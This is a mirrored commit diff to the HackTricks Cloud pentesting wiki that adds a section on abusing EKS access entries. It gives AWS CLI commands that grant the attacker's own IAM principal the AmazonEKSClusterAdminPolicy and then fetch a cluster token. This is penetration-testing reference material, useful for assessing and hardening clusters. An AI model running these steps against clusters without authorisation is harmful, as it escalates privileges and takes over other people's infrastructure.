gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-06-12 11:01:38 -07:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #298 from cblopez/patch-1

Browse Source 
Added access entry abuse to pivot from AWS to Kubernetes
This commit is contained in:
SirBroccoli
2026-06-05 15:51:47 +02:00
committed by GitHub
parent 45e53868a6 97af0f5005
commit ab22b74079
1 changed files with 27 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation/README.md
+27 -1
View File
@@ -80,7 +80,9 @@ users:
The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**.
The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**.
#### Abusing configmap
The traditional way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**.
> [!WARNING]
> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**.
@@ -89,6 +91,30 @@ For more information about how to **grant extra privileges to IAM roles & users*
Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**.
#### Abusing Access Entries
AWS implementes an additional way to grant IAM users access to the Kubernetes cluster through access entries. If you have the `eks:CreateAccessEntry` and `eks:AssociateAccessPolicy` permissions, you may also be able to assign a Kubernetes administrator role to either your user or a specific rol.
First, **create an access entry for your user or role**:
```
aws eks create-access-entry --cluster-name <cluster_name> --region <region> --principal-arn <arn_from_your_user_or_role> --type STANDARD
```
With that entry created, you may now be able to assign a policy directly to it. There is a built-in AWS policy called *AmazonEKSClusterAdminPolicy* that may be used directly. Keep in mind that if your environment has some other custom policies that also grant elevated privileges in EKS, you may change the `--policy-arn` to any of those:
```
aws eks associate-access-policy --cluster-name <cluster_name> --region <region> --principal-arn <arn_from_your_user_or_role> --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy --access-scope type=cluster
```
You can search for this policy in AWS official documentation [**here**](https://docs.aws.amazon.com/eks/latest/userguide/access-policy-permissions.html#access-policy-permissions-amazoneksclusteradminpolicy)
From this point on, you may now be able to request a *k8s* token and interact with the cluster as an administrator:
```
aws eks get-token --cluster-name <cluster_name> --output json | jq -r '.status.token'
```
### From Kubernetes to AWS
It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1).